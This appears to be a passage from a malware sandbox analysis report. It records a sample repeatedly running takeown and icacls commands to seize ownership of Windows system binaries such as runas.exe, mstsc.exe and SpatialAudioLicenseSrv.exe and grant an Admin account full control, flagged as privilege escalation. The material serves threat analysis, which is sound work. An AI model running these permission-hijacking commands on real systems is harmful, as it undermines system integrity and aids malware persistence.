C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1628 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1488
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3160 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2196 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:776 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2860
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3416 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4600 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1344 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4408 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\runas.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4472 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1032 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3940 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3024 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:1736 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3692 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5648 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5728
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5756 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5780
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5840
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5896
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5980
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:6008
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:6088
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:6104 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:4668 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1712
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5176
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4704 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5124
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5160
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5300 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5360 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:5376 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5444
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:5504 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5540 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:5604 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:540
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4424
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5704 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1804 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2176
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:4468 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5676
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:8
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5328
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4520
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3688
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:2636
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1756
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5752
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5528 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:1140
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1360
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:4152 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5064 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4944
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1884
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5936
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2928 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4816
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5616 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:4508 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5924
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5892
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1264 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:5720 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3196 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:2708 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5916
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:6052 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5764
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5784
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:556
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:3564
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4380
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:5964 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:6036 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4444
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:6092
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5184
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4764
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4704
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5420
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5380
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5600
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5376
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5448
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:5492 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:436
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:3824 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2476 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5744
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2612 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:1816 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4372
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:3608
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2392
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:4432 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3960 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5660
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2556 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:3192
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:768 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5140 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2772
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:4072 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1076 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:3932 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5832 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4368
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1716
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5424
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5960 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:4604 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4872 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:3812 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5732 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:2680 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3444
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5976
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5336 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5812
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1960 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:6124
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5672 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4940
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2360 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:548 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5840
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2404 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5348
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4420 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:2324 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1144
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5808 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5176 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5564
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5904
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:2960
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5572
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:6064
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3564
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2752
-
